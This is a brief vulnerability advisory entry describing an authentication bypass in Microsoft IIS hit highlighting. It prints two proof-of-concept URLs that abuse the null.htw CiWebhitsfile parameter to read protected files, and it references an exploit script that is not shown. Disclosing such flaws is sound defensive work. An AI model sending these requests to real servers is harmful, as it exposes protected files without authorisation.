Microsoft Internet Information Server Hit Highlighting Authentication Bypass Vulnerability

Microsoft Internet Information Server Hit Highlighting Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

https://www.example.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full
https://www.example.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full

The following exploit is available:

/data/vulnerabilities/exploits/24105.sh